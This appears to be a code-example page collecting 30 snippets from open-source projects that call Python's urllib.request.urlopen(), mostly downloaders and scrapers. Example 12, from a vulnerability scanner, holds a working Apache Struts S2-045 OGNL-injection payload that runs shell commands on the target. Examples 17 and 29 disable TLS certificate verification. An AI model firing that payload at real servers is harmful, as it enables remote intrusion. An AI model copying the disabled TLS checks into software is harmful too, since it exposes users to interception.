Python urllib.request.urlopen() Examples
The following are 30 code examples for showing how to use urllib.request.urlopen(). These examples are extracted from open source projects. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example.
You may check out the related API usage on the sidebar.
You may also want to check out all available functions/classes of the module
urllib.request
, or try the search function
.
Example 1
Project: gog-galaxy-plugin-downloader Author: Slashbunny File: download.py License: GNU General Public License v3.0 | 7 votes |
def get_plugin_config(config_uri): """ Downloads/opens configuration yaml file, returns dict of Galaxy plugins """ # Try to open the URI as a URL or fall back to opening local file try: config_uri_parsed = urlparse(config_uri) if config_uri_parsed.scheme in ['https', 'http']: url = urlopen(config_uri) yaml_data = url.read() else: with open(config_uri, 'r') as file_data: yaml_data = file_data.read() except URLError as e: print(e) # Parse the YAML configuration try: plugin_data = yaml.safe_load(yaml_data) return plugin_data['plugins'] except yaml.YAMLError as e: print(e)
Example 2
Project: L.E.S.M.A Author: NatanaelAntonioli File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py License: Apache License 2.0 | 7 votes |
def run(self): request = self.request try: if ((timeit.default_timer() - self.starttime) <= self.timeout and not SHUTDOWN_EVENT.isSet()): try: f = urlopen(request) except TypeError: # PY24 expects a string or buffer # This also causes issues with Ctrl-C, but we will concede # for the moment that Ctrl-C on PY24 isn't immediate request = build_request(self.request.get_full_url(), data=request.data.read(self.size)) f = urlopen(request) f.read(11) f.close() self.result = sum(self.request.data.total) else: self.result = 0 except (IOError, SpeedtestUploadTimeout): self.result = sum(self.request.data.total)
Example 3
Project: neural-fingerprinting Author: StephanZheng File: download_images.py License: BSD 3-Clause "New" or "Revised" License | 7 votes |
def download_image(image_id, url, x1, y1, x2, y2, output_dir): """Downloads one image, crops it, resizes it and saves it locally.""" output_filename = os.path.join(output_dir, image_id + '.png') if os.path.exists(output_filename): # Don't download image if it's already there return True try: # Download image url_file = urlopen(url) if url_file.getcode() != 200: return False image_buffer = url_file.read() # Crop, resize and save image image = Image.open(BytesIO(image_buffer)).convert('RGB') w = image.size[0] h = image.size[1] image = image.crop((int(x1 * w), int(y1 * h), int(x2 * w), int(y2 * h))) image = image.resize((299, 299), resample=Image.ANTIALIAS) image.save(output_filename) except IOError: return False return True
Example 4
Project: dynamic-training-with-apache-mxnet-on-aws Author: awslabs File: diagnose.py License: Apache License 2.0 | 7 votes |
def test_connection(name, url, timeout=10): """Simple connection test""" urlinfo = urlparse(url) start = time.time() try: ip = socket.gethostbyname(urlinfo.netloc) except Exception as e: print('Error resolving DNS for {}: {}, {}'.format(name, url, e)) return dns_elapsed = time.time() - start start = time.time() try: _ = urlopen(url, timeout=timeout) except Exception as e: print("Error open {}: {}, {}, DNS finished in {} sec.".format(name, url, e, dns_elapsed)) return load_elapsed = time.time() - start print("Timing for {}: {}, DNS: {:.4f} sec, LOAD: {:.4f} sec.".format(name, url, dns_elapsed, load_elapsed))
Example 5
Project: QCElemental Author: MolSSI File: pubchem.py License: BSD 3-Clause "New" or "Revised" License | 6 votes |
def get_sdf(self): """Function to return the SDF (structure-data file) of the PubChem object.""" from urllib.request import urlopen, Request from urllib.parse import quote from urllib.error import URLError if len(self.dataSDF) == 0: url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/{}/SDF?record_type=3d".format( quote(str(self.cid)) ) req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"}) try: self.dataSDF = urlopen(req).read().decode("utf-8") except URLError as e: msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e) msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n" print(msg) raise ValidationError(msg) return self.dataSDF
Example 6
Project: Recipes Author: Lasagne File: cifar10.py License: MIT License | 6 votes |
def download_dataset(path, source='https://www.cs.toronto.edu/~kriz/' 'cifar-10-python.tar.gz'): """ Downloads and extracts the dataset, if needed. """ files = ['data_batch_%d' % (i + 1) for i in range(5)] + ['test_batch'] for fn in files: if not os.path.exists(os.path.join(path, 'cifar-10-batches-py', fn)): break # at least one file is missing else: return # dataset is already complete print("Downloading and extracting %s into %s..." % (source, path)) if sys.version_info[0] == 2: from urllib import urlopen else: from urllib.request import urlopen import tarfile if not os.path.exists(path): os.makedirs(path) u = urlopen(source) with tarfile.open(fileobj=u, mode='r|gz') as f: f.extractall(path=path) u.close()
Example 7
Project: pyhanlp Author: hankcs File: __init__.py License: Apache License 2.0 | 6 votes |
def hanlp_releases(cache=True): global HANLP_RELEASES if cache and HANLP_RELEASES: return HANLP_RELEASES # print('Request GitHub API') req = urllib.Request('http://nlp.hankcs.com/download.php?file=version') req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36') if PY == 3: content = urllib.urlopen(req).read() else: content = urllib.urlopen(req).read() content = json.loads(content.decode()) jar_version, jar_url, data_version, data_url = content meta = [(jar_version, jar_url, data_version, data_url)] HANLP_RELEASES = meta return meta
Example 8
Project: script.module.inputstreamhelper Author: emilsvennesson File: utils.py License: MIT License | 6 votes |
def _http_request(url, headers=None, time_out=10): """Perform an HTTP request and return request""" log(0, 'Request URL: {url}', url=url) try: if headers: request = Request(url, headers=headers) else: request = Request(url) req = urlopen(request, timeout=time_out) log(0, 'Response code: {code}', code=req.getcode()) if 400 <= req.getcode() < 600: raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req) except (HTTPError, URLError) as err: log(2, 'Download failed with error {}'.format(err)) if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065))): # Internet down, try again? return _http_request(url, headers, time_out) return None return req
Example 9
Project: IGMC Author: muhanzhang File: data_utils.py License: MIT License | 6 votes |
def download_dataset(dataset, files, data_dir): """ Downloads dataset if files are not present. """ if not np.all([os.path.isfile(data_dir + f) for f in files]): url = "http://files.grouplens.org/datasets/movielens/" + dataset.replace('_', '-') + '.zip' request = urlopen(url) print('Downloading %s dataset' % dataset) if dataset in ['ml_100k', 'ml_1m']: target_dir = 'raw_data/' + dataset.replace('_', '-') elif dataset == 'ml_10m': target_dir = 'raw_data/' + 'ml-10M100K' else: raise ValueError('Invalid dataset option %s' % dataset) with ZipFile(BytesIO(request.read())) as zip_ref: zip_ref.extractall('raw_data/') os.rename(target_dir, data_dir) #shutil.rmtree(target_dir)
Example 10
Project: dot2moon Author: fnk0c File: connection.py License: MIT License | 6 votes |
def HTML(self, check): try: if self.UserAgent != None: page_html = urlopen(Request( self.target_url, headers={"User-Agent":self.UserAgent}), timeout=self.TimeOut).read().decode("utf-8") #If not, the default will be used else: page_html = urlopen( self.target_url, timeout=self.TimeOut).read().decode("utf-8") except HTTPError: page_html = "Can't get page source code" if self.verbose == True: print(" [+] Source code got from %s" % self.target_url) print("----START" + "-"*71) print(page_html) print("----END" + "-"*73) return(page_html)
Example 11
Project: dot2moon Author: fnk0c File: connection.py License: MIT License | 6 votes |
def post(self, payload, request_par): data = parse.urlencode(request_par).encode() if self.UserAgent != None: req = Request( self.target_url, data=data, headers={"User-Agent":self.UserAgent}) conn = urlopen(req, timeout=self.TimeOut) else: conn = urlopen(self.target_url, data=data, timeout=self.TimeOut) html = conn.read().decode("utf-8") page_size = len(html) if self.verbose == True: print(" [+] Source code got from %s" % payload) print("----START" + "-"*71) print(html) print("----END" + "-"*73) return(self.target_url, page_size, html, payload)
Example 12
Project: Vxscan Author: al0ne File: apache_struts_all.py License: Apache License 2.0 | 6 votes |
def st045(self): try: cmd = self.linux header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header[ "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" r = request.Request(self.url, headers=header) text = request.urlopen(r).read() except http.client.IncompleteRead as e: text = e.partial except Exception: pass if 'text' in locals().keys(): self.random = str(self.random) if self.random.encode('utf-8') in text and len(text) < 15: self.result.append('Apache S2-045 Vulnerability: ' + self.url)
Example 13
Project: fetchLandsatSentinelFromGoogleCloud Author: vascobnunes File: fels.py License: MIT License | 6 votes |
def download_metadata_file(url, outputdir, program): """Download and unzip the catalogue files.""" zipped_index_path = os.path.join(outputdir, 'index_' + program + '.csv.gz') if not os.path.isfile(zipped_index_path): if not os.path.exists(os.path.dirname(zipped_index_path)): os.makedirs(os.path.dirname(zipped_index_path)) print("Downloading Metadata file...") content = urlopen(url) with open(zipped_index_path, 'wb') as f: shutil.copyfileobj(content, f) index_path = os.path.join(outputdir, 'index_' + program + '.csv') if not os.path.isfile(index_path): print("Unzipping Metadata file...") with gzip.open(zipped_index_path) as gzip_index, open(index_path, 'wb') as f: shutil.copyfileobj(gzip_index, f) return index_path
Example 14
Project: AboveTustin Author: kevinabrandon File: flightdata.py License: MIT License | 5 votes |
def refresh(self): try: #open the data url self.req = urlopen(self.data_url) #read data from the url self.raw_data = self.req.read() #load in the json self.json_data = json.loads(self.raw_data.decode()) #get time from json self.time = datetime.fromtimestamp(self.parser.time(self.json_data)) #load all the aircarft self.aircraft = self.parser.aircraft_data(self.json_data, self.time) except Exception: print("exception in FlightData.refresh():") traceback.print_exc()
Example 15
Project: pkmeter Author: pkkid File: utils.py License: BSD 3-Clause "New" or "Revised" License | 5 votes |
def http_request(url, data=None, timeout=30): log.debug("Requesting URL: %s" % url) data = urlencode(data).encode('utf8') if data else None try: response = urlopen(url, data=data, timeout=timeout) return {'success':True, 'response':response, 'url':url} except Exception as err: log.error("Error requesting URL: %s; %s" % (url, err)) return {'success':False, 'error':err, 'url':url}
Example 16
Project: Learning-Concurrency-in-Python Author: PacktPublishing File: asCompleted.py License: MIT License | 5 votes |
def checkStatus(url): print("Attempting to crawl URL: {}".format(url)) req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) response = urlopen(req) return response.getcode(), url
Example 17
Project: Learning-Concurrency-in-Python Author: PacktPublishing File: timeitContext.py License: MIT License | 5 votes |
def myFunction(): # We create this context so that we can crawl # https sites myssl = ssl.create_default_context(); myssl.check_hostname=False myssl.verify_mode=ssl.CERT_NONE with Timer() as t: req = Request('https://tutorialedge.net', headers={'User-Agent': 'Mozilla/5.0'}) response = urlopen(req, context=myssl) print("Elapsed Time: {} seconds".format(t.elapsed))
Example 18
Project: L.E.S.M.A Author: NatanaelAntonioli File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py License: Apache License 2.0 | 5 votes |
def catch_request(request): """Helper function to catch common exceptions encountered when establishing a connection with a HTTP/HTTPS request """ try: uh = urlopen(request) return uh, False except HTTP_ERRORS: e = get_exception() return None, e
Example 19
Project: L.E.S.M.A Author: NatanaelAntonioli File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py License: Apache License 2.0 | 5 votes |
def run(self): try: if (timeit.default_timer() - self.starttime) <= self.timeout: f = urlopen(self.request) while (not SHUTDOWN_EVENT.isSet() and (timeit.default_timer() - self.starttime) <= self.timeout): self.result.append(len(f.read(10240))) if self.result[-1] == 0: break f.close() except IOError: pass
Example 20
Project: sqliv Author: the-robot File: google.py License: GNU General Public License v3.0 | 5 votes |
def get_page(url): """ Request the given URL and return the response page, using the cookie jar. @type url: str @param url: URL to retrieve. @rtype: str @return: Web page retrieved for the given URL. @raise IOError: An exception is raised on error. @raise urllib2.URLError: An exception is raised on error. @raise urllib2.HTTPError: An exception is raised on error. """ request = Request(url) request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)') cookie_jar.add_cookie_header(request) response = urlopen(request) cookie_jar.extract_cookies(response, request) html = response.read() response.close() cookie_jar.save() return html # Filter links found in the Google result pages HTML code. # Returns None if the link doesn't yield a valid result.
Example 21
Project: arxiv-collector Author: djsutherland File: arxiv_collector.py License: BSD 3-Clause "New" or "Revised" License | 5 votes |
def get_latexmk(version="ctan", dest="latexmk", verbose=True): try: from urllib.request import urlopen except ImportError: from urllib2 import urlopen as _urlopen from contextlib import closing def urlopen(*args, **kwargs): return closing(_urlopen(*args, **kwargs)) import shutil import zipfile if version.lower() == "ctan": url = "http://mirrors.ctan.org/support/latexmk.zip" else: v = version.replace(".", "") url = "http://personal.psu.edu/jcc8/software/latexmk-jcc/latexmk-{}.zip".format(v) with io.BytesIO() as bio: if verbose: print("Downloading latexmk {}...".format(version), file=sys.stderr, end="") with urlopen(url) as web: shutil.copyfileobj(web, bio, length=131072) with zipfile.ZipFile(bio) as z: for zinfo in z.infolist(): if os.path.basename(zinfo.filename) == "latexmk.pl": with z.open(zinfo) as script, io.open(dest, "wb") as out: shutil.copyfileobj(script, out) # executable: https://stackoverflow.com/a/30463972/344821 mode = os.stat(dest).st_mode mode |= (mode & 0o444) >> 2 # copy R bits to X os.chmod(dest, mode) break else: raise ValueError("Couldn't find latexmk.pl in {}".format(url)) if verbose: print("saved to `{}`.".format(dest), file=sys.stderr)
Example 22
Project: TumblrDownloader Author: DiSiqueira File: tumblrdownloader.py License: MIT License | 5 votes |
def _getimages(self): ''' Get all images returned by Tumblr API ''' site = self.api_url.replace("#start#",str(self._start)) file = urlopen(site) data = file.read().decode('utf8') file.close() regex = r"<photo-url max-width=\"" + str(self._resolution) + "\">(.+?)</photo-url>" imagelist = re.findall(regex, data) return imagelist
Example 23
Project: bioservices Author: cokelaer File: xmltools.py License: GNU General Public License v3.0 | 5 votes |
def __init__(self, url, encoding="utf-8"): self.data = urlopen(url).read() super(readXML, self).__init__(self.data, encoding)
Example 24
Project: SublimeKSP Author: nojanath File: ksp_plugin.py License: GNU General Public License v3.0 | 5 votes |
def read_file_function(self, filepath): if filepath.startswith('http://'): from urllib.request import urlopen s = urlopen(filepath, timeout=5).read().decode('utf-8') return re.sub('\r+\n*', '\n', s) if self.base_path: filepath = os.path.join(self.base_path, filepath) filepath = os.path.abspath(filepath) view = CompileKspThread.find_view_by_filename(filepath, self.base_path) if view is None: s = codecs.open(filepath, 'r', 'utf-8').read() return re.sub('\r+\n*', '\n', s) else: return view.substr(sublime.Region(0, view.size()))
Example 25
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_all_recipes_fn(page_str, page_num): base_url = 'http://www.foodnetwork.com' search_url_str = 'recipes/a-z' url = '{}/{}/{}/p/{}'.format(base_url, search_url_str, page_str, page_num) try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") recipe_link_items = soup.select('div.o-Capsule__m-Body ul.m-PromoList li a') recipe_links = [r.attrs['href']for r in recipe_link_items] print('Read {} recipe links from {}'.format(len(recipe_links), url)) return recipe_links except (HTTPError, URLError): print('Could not parse page {}'.format(url)) return []
Example 26
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_all_recipes_ar(page_num): base_url = 'http://allrecipes.com' search_url_str = 'recipes/?page' url = '{}/{}={}'.format(base_url, search_url_str, page_num) try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") recipe_link_items = soup.select('article > a:nth-of-type(1)') recipe_links = list(set( [r['href'] for r in recipe_link_items if r is not None and r['href'].split('/')[1] == 'recipe'])) return {base_url + r: get_recipe(base_url + r) for r in recipe_links} except (HTTPError, URLError): print('Could not parse page {}'.format(url)) return []
Example 27
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_all_recipes_epi(page_num): base_url = 'http://www.epicurious.com' search_url_str = 'search/?content=recipe&page' url = '{}/{}={}'.format(base_url, search_url_str, page_num) try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item') recipe_links = [r['href'] for r in recipe_link_items] return {base_url + r: get_recipe(base_url + r) for r in recipe_links} except (HTTPError, URLError): print('Could not parse page {}'.format(url)) return []
Example 28
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_fn_letter_links(): # get list of pages with links to recipes base_url = 'http://www.foodnetwork.com' search_url_str = 'recipes/a-z' url = '{}/{}/{}'.format(base_url, search_url_str, '') try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") page_link_items = soup.select('ul.o-IndexPagination__m-List li a') letter_links = [p['href'] for p in page_link_items] return letter_links except (HTTPError, URLError): print('Could not parse page {}'.format(url))
Example 29
Project: ffplayout-engine Author: ffplayout File: playlist.py License: GNU General Public License v3.0 | 5 votes |
def get_playlist(self): if stdin_args.playlist: self.json_file = stdin_args.playlist else: year, month, day = self.list_date.split('-') self.json_file = os.path.join( _playlist.path, year, month, self.list_date + '.json') if '://' in self.json_file: self.json_file = self.json_file.replace('\\', '/') try: req = request.urlopen(self.json_file, timeout=1, context=ssl._create_unverified_context()) b_time = req.headers['last-modified'] temp_time = time.strptime(b_time, "%a, %d %b %Y %H:%M:%S %Z") mod_time = time.mktime(temp_time) if mod_time > self.last_mod_time: self.clip_nodes = valid_json(req) self.last_mod_time = mod_time messenger.info('Open: ' + self.json_file) validate_thread(self.clip_nodes) except (request.URLError, socket.timeout): self.eof_handling('Get playlist from url failed!', False) elif os.path.isfile(self.json_file): # check last modification from playlist mod_time = os.path.getmtime(self.json_file) if mod_time > self.last_mod_time: with open(self.json_file, 'r', encoding='utf-8') as f: self.clip_nodes = valid_json(f) self.last_mod_time = mod_time messenger.info('Open: ' + self.json_file) validate_thread(self.clip_nodes) else: self.clip_nodes = None
Example 30
Project: dot2moon Author: fnk0c File: connection.py License: MIT License | 5 votes |
def PageSize(self, check): #If different User Agent is required if check == True: try: if self.UserAgent != None: page_size = len(urlopen(Request( self.target_url + "a", headers={"User-Agent":self.UserAgent}), timeout=self.TimeOut).read()) #If not, default will be used else: page_size = len(urlopen( self.target_url + "a", timeout=self.TimeOut).read()) except HTTPError as e: print(e) page_size = "Can't get default page size" if self.verbose == True: print(" [+] Default page size: %s bytes" % page_size) else: if self.UserAgent != None: page_size = len(urlopen(Request( self.target_url, headers={"User-Agent":self.UserAgent}), timeout=self.TimeOut).read()) #If not, default will be used else: page_size = len(urlopen( self.target_url, timeout=self.TimeOut).read()) if self.verbose == True: print(self.target_url, page_size) return(self.target_url, page_size)